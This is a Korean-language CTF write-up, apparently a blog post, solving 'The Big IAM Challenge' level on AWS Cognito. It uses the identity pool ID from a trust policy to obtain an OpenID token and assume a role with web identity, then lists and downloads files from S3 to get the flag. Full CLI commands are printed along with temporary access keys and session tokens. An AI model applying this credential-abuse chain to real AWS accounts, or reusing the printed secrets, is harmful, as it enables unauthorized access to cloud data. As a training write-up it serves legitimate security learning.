One final push 문제
설명
Anonymous access no more. Let's see what can you do now. Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "cognito-identity.amazonaws.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
}
}
]
}풀이
이번 문제는 Cognito_s3accessAuth_Role이 존재한다는 것만 알려주고 있으나 Role Name을 고려하였을 때 s3 내에 flag가 존재할 가능성이 높다는 것을 알 수 있음
또한, 조건 내 cognito-identity의 aud 값을 알려주고 있어 해당 값을 이용하여 문제를 풀 수 있다고 판단함
해당 aud 값을 통하여 Cognito의 OPEN ID TOKEN을 획득하고 이를 통하여 임시 자격 증명을 획득함으로써 S3 내 존재하는 File을 다운로드 받아 Flag를 획득할 수 있었음
PoC
1. Cognito 사용을 위해 웹 내 AWS의 환경 변수를 개인 PC에 적용
(이유는 모르지만 웹 내 CLI에서는 sts가 정상적으로 작동하지 않아 export를 통해 ACCESS_KEY, SECRET_KEY, SESSION_TOKEN 등을 개인 PC에 적용하여 명령어를 수행함...)
PS> $Env:AWS_ACCESS_KEY_ID="ASIAZSFITKRS5LPKJTJQ"
PS> $Env:AWS_SECRET_ACCESS_KEY="g9OJ0Q3Z3YC5t4F6Qi5HjUg6UXm9yN0KRcndMH9K"
PS> $Env:AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEBYaCXVzLWVhc3QtMSJIMEYCIQDb9rIh2vIkg4T/Tn73KEKfxOHJTzBBwPFuNO6LDZcZGgIhAOTyQlw6PqkeNQoAtv0GbHRwd4HBnEEaEaNR7xo2GSWvKu8CCI///////////wEQABoMNjU3NDgzNTg0NjEzIgzH8JRdm+Cs4IiDhpYqwwKI3kBdCmirt4QlZK6dKGL5ySta98wACrdTvVvWFdzUgM5ALBv28yvr/v602NKZUSm8CHBSmWJNUZhx1ZNoxa0kKAHh9ijKtZtLBJPsJQQ09cJZ9NGx5GjWlIHPRKPZ9CiiTfIxgmSVACEXvFmHp8cuHo2VD8MxHQn2U1vhYxZnmGd1wOZ8wzhqhOf0GifShwt79Pk+Z+3s2c4w9jDoEFRrj5mxFyvQwDQcggVLOUoacp+31zea6yWiz53WFuYDjsTqL8hN6lc+jFPIB1HToGcyRMTtiiEw+7re9tVUlvjdm3SolVZ9J764SKn46K0+2qvJT9CpN7mfKk1hx92f/d9fdygpdXpysSse/CUIrjzdK/TgneDNGcZbBqhQVFZvabKSfNztBRMCyHt79NgrP0iyV/IRYJC6ltMEIEHa4oCdjKgyMjDA76qlBjqdAQYpCp2XJj0efDPCL45o1rEV2RFC1Ewz5v+eoEbGcSdU2gvJhCIq45mKFzbuM1vfb7sZxgXd/jovImUThZx2xU6VD7vPOIjLzZEUm1vFo4XNFnNxVyl7WIlFFHaqXjRf/zfvWy3tSOYTpy4Fg+qCcuvJW1xNpPW2zxRiXnCotldfgcqnIT3UpgOO7vzeowVVof2eJPY9qaFuBlvR2yM="
2. IAM Policy 내 존재하는 aud는 identity-pool-id로, 해당 값을 이용하여 IdentityId 값을 획득할 수 있음
> aws cognito-identity get-id --region us-east-1 --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
"IdentityId": "us-east-1:6c236592-4ba6-4bc8-b1d4-c3f9db2dc4f8"
}
3. 획득한 IdentityId 값을 이용하여 OPEN ID TOKEN 값을 할당 받음
OPEN ID TOKEN : Cognito에서 발급 받을 수 있는 JWT 토큰으로 일반적으로 10분에 해당하는 만료 시간을 가지고 있음
> aws cognito-identity get-open-id-token --region us-east-1 --identity-id us-east-1:6c236592-4ba6-4bc8-b1d4-c3f9db2dc4f8
{
"IdentityId": "us-east-1:6c236592-4ba6-4bc8-b1d4-c3f9db2dc4f8",
"Token": "eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6NmMyMzY1OTItNGJhNi00YmM4LWIxZDQtYzNmOWRiMmRjNGY4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2ODg5MTIyNDUsImlhdCI6MTY4ODkxMTY0NX0.fJMlVkc3jRfbYXdAD8HB8unQKHiEaiRCjUQTI7rcu39dGoohlGFpBH6aYdDpAy__yycohwmKxKcEYGB5C63unJd_S73oEFcG0_NWe0aRz_SIK_Bz3CegYHGIcxgyv1qAqrw4agdfJgWyyiVUOUuNXe5OGdB7Ccp3bFq1j4rT4XrWrAHCajFMbbBGFSo7tYpaHl4ebfT2FoixpZB1GCdq0Ivh-Fzl8R8sXL9r0OZB9TfIUZlEx3z6sUGJFZnHTpMhmRBb_rDo4wtIUDXVfsV7KrAdk81nI849Qj1R7p4UMbKmCogzDufK_WlSvuEEoedkWRYjA-G-fD9AQ7nzPE0rWA"
}
4. 할당 받은 OPEN ID TOKEN을 이용하여 sts(Security Token Service) 기능으로 임시 보안 자격 증명을 발급 받았음
> aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role" --role-session-name "Cognito_s3accessAuth_Role" --web-identity-token "eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6NmMyMzY1OTItNGJhNi00YmM4LWIxZDQtYzNmOWRiMmRjNGY4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2ODg5MTIyNDUsImlhdCI6MTY4ODkxMTY0NX0.fJMlVkc3jRfbYXdAD8HB8unQKHiEaiRCjUQTI7rcu39dGoohlGFpBH6aYdDpAy__yycohwmKxKcEYGB5C63unJd_S73oEFcG0_NWe0aRz_SIK_Bz3CegYHGIcxgyv1qAqrw4agdfJgWyyiVUOUuNXe5OGdB7Ccp3bFq1j4rT4XrWrAHCajFMbbBGFSo7tYpaHl4ebfT2FoixpZB1GCdq0Ivh-Fzl8R8sXL9r0OZB9TfIUZlEx3z6sUGJFZnHTpMhmRBb_rDo4wtIUDXVfsV7KrAdk81nI849Qj1R7p4UMbKmCogzDufK_WlSvuEEoedkWRYjA-G-fD9AQ7nzPE0rWA"
{
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXK77S7HG6",
"SecretAccessKey": "PW3ljgmORD0vbpSVvA+9Kc7B1D8KCKz1cOmc3iyd",
"SessionToken": "IQoJb3JpZ2luX2VjEBYaDmFwLW5vcnRoZWFzdC0yIkcwRQIgOKTwo+LH1sATY5LaNiAsKYQ2/ZiTHottjawPmOO0C4cCIQDnyOgV7uqz8wjPjgAMx6hJvjRhhGDuG2LFoD3blrL5siqjAwiP//////////8BEAAaDDA5MjI5Nzg1MTM3NCIMRl/jpOX3FYQMSeCSKvcC7Pd5ska1TRNAGC5HA0f27CtV+g/zlQakM/mFqP+6znrnTkIGC37wQdvU6s89dx9yyS+4JB22snrDSmon9cdFsSuQquFp+rJUmSyW9hEojaWzWsE9OhdyT1YByMd8+BkHKJgtMn6dOXlE2Yg0XmvZGMAOS8wKkEvRp8ORiguKsoJ+tFiYkvDfB6ddUiFAZo3pTPpzDt/LZJMbfA9RpCamORcSG4/aWpQ+Fhi9wQwJrvr3j1ezJ3K/g2Uu7cwsHb4pSkMmoyM1ycnTlzB3lUHrIBJlrRwm/v2UR63g68/IKWM31zQMqxdQitVxZwlKyIJkHn46jmsdyWWvcc54WuJehRlojr7u7xhmqK4H92hRm7ZkEBkmZ0DN8a84GcugBVDNlUTDBFECEOzRSl1e+qc0juQzGIl52F+RtTCCzSk9rarwR8E+xFH9ChbSiKc8c0g2hBqRj4roB+nZfBteppafF0IrhX+xKwdQ9bT90VFAech2otm6gqAcMLH+qqUGOocCSWoMu5WO6862XPvFkEVlq4a+kDJh6Qa+xpBpzGEdV9kGcWCxYRQtJgAKnzAbcAT8ybWmb+MtT95eKPPr7aDxP9HLehFEP6JsA7HEhIpEEVzmE0PtmL3WMK1QdaHLbY6qvLNKzV5e01Ja6uWgJzAIWp+0S4qtTKLBM1zARvJyOQSZMFTVxzqasEWXdsstKkcRt5VU7XcM9VdEYAThM8oUsHPNiHzVQPApHovwUp6zRy+pv4sbNNHtPCLm0VkQ+2+YGe2kpG3lfE5CHmAYW9t8oYVPptaK4Db0K++Tlm46LYR5aM21+Ts2LmoZ/kfx2yzZo4xqpdqxVmDXoeqmX7/WTJvyGeEW31g=",
"Expiration": "2023-07-09T15:07:45+00:00"
},
"SubjectFromWebIdentityToken": "us-east-1:6c236592-4ba6-4bc8-b1d4-c3f9db2dc4f8",
"AssumedRoleUser": {
"AssumedRoleId": "AROARK7LBOHXASFTNOIZG:Cognito_s3accessAuth_Role",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/Cognito_s3accessAuth_Role"
},
"Provider": "cognito-identity.amazonaws.com",
"Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
5. 임시 보안 자격 증명을 개인 PC에 적용함
PS > $Env:AWS_ACCESS_KEY_ID="ASIARK7LBOHXK77S7HG6"
PS> $Env:AWS_SECRET_ACCESS_KEY="PW3ljgmORD0vbpSVvA+9Kc7B1D8KCKz1cOmc3iyd"
PS> $Env:AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEBYaDmFwLW5vcnRoZWFzdC0yIkcwRQIgOKTwo+LH1sATY5LaNiAsKYQ2/ZiTHottjawPmOO0C4cCIQDnyOgV7uqz8wjPjgAMx6hJvjRhhGDuG2LFoD3blrL5siqjAwiP//////////8BEAAaDDA5MjI5Nzg1MTM3NCIMRl/jpOX3FYQMSeCSKvcC7Pd5ska1TRNAGC5HA0f27CtV+g/zlQakM/mFqP+6znrnTkIGC37wQdvU6s89dx9yyS+4JB22snrDSmon9cdFsSuQquFp+rJUmSyW9hEojaWzWsE9OhdyT1YByMd8+BkHKJgtMn6dOXlE2Yg0XmvZGMAOS8wKkEvRp8ORiguKsoJ+tFiYkvDfB6ddUiFAZo3pTPpzDt/LZJMbfA9RpCamORcSG4/aWpQ+Fhi9wQwJrvr3j1ezJ3K/g2Uu7cwsHb4pSkMmoyM1ycnTlzB3lUHrIBJlrRwm/v2UR63g68/IKWM31zQMqxdQitVxZwlKyIJkHn46jmsdyWWvcc54WuJehRlojr7u7xhmqK4H92hRm7ZkEBkmZ0DN8a84GcugBVDNlUTDBFECEOzRSl1e+qc0juQzGIl52F+RtTCCzSk9rarwR8E+xFH9ChbSiKc8c0g2hBqRj4roB+nZfBteppafF0IrhX+xKwdQ9bT90VFAech2otm6gqAcMLH+qqUGOocCSWoMu5WO6862XPvFkEVlq4a+kDJh6Qa+xpBpzGEdV9kGcWCxYRQtJgAKnzAbcAT8ybWmb+MtT95eKPPr7aDxP9HLehFEP6JsA7HEhIpEEVzmE0PtmL3WMK1QdaHLbY6qvLNKzV5e01Ja6uWgJzAIWp+0S4qtTKLBM1zARvJyOQSZMFTVxzqasEWXdsstKkcRt5VU7XcM9VdEYAThM8oUsHPNiHzVQPApHovwUp6zRy+pv4sbNNHtPCLm0VkQ+2+YGe2kpG3lfE5CHmAYW9t8oYVPptaK4Db0K++Tlm46LYR5aM21+Ts2LmoZ/kfx2yzZo4xqpdqxVmDXoeqmX7/WTJvyGeEW31g="
6. AWS S3 Bucket List 확인 후, Bucket 내 존재하는 File을 다운로드 받아 Flag를 획득하였음
> aws s3 ls
2023-06-07 01:32:38 tbic-wiz-analytics-bucket-b44867f
2023-06-07 01:35:10 thebigiamchallenge-admin-storage-abf1321
2023-06-05 22:14:20 thebigiamchallenge-storage-9979f4b
2023-06-05 22:28:31 wiz-privatefiles
2023-06-05 22:28:32 wiz-privatefiles-x1000
> aws s3 ls s3://wiz-privatefiles-x1000/
2023-06-06 04:42:27 4220 cognito2.png
2023-06-05 22:28:35 40 flag2.txt
> aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt ./
download: s3://wiz-privatefiles-x1000/flag2.txt to .\flag2.txt
> type flag2.txt
{wiz:open-sesame-or-shell-i-say-openid}
Reference
cognito-identity — AWS CLI 2.13.0 Command Reference
Description Amazon Cognito Federated Identities is a web service that delivers scoped temporary credentials to mobile devices and other untrusted environments. It uniquely identifies a device and supplies the user with a consistent identity over the lifeti
awscli.amazonaws.com
assume-role-with-web-identity — AWS CLI 2.13.0 Command Reference
The duration, in seconds, of the role session. The value can range from 900 seconds (15 minutes) up to the maximum session duration setting for the role. This setting can have a value from 1 hour to 12 hours. If you specify a value higher than this setting
awscli.amazonaws.com
Cognito Identity Pools - HackTricks Cloud
With an identity pool, your users can obtain temporary AWS credentials to access AWS services, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users
cloud.hacktricks.xyz
'Hack > Cloud' 카테고리의 다른 글
| [IMDS] AWS Instance Meta-data Service를 활용한 공격 (0) | 2023.08.15 |
|---|---|
| [The Big IAM Challenge] Do I know you? (0) | 2023.07.09 |
| [The Big IAM Challenge] Admin only? (0) | 2023.07.09 |
| [The Big IAM Challenge] Enable Push Notifications (0) | 2023.07.09 |
| [The Big IAM Challenge] Google Analytics (0) | 2023.07.09 |
댓글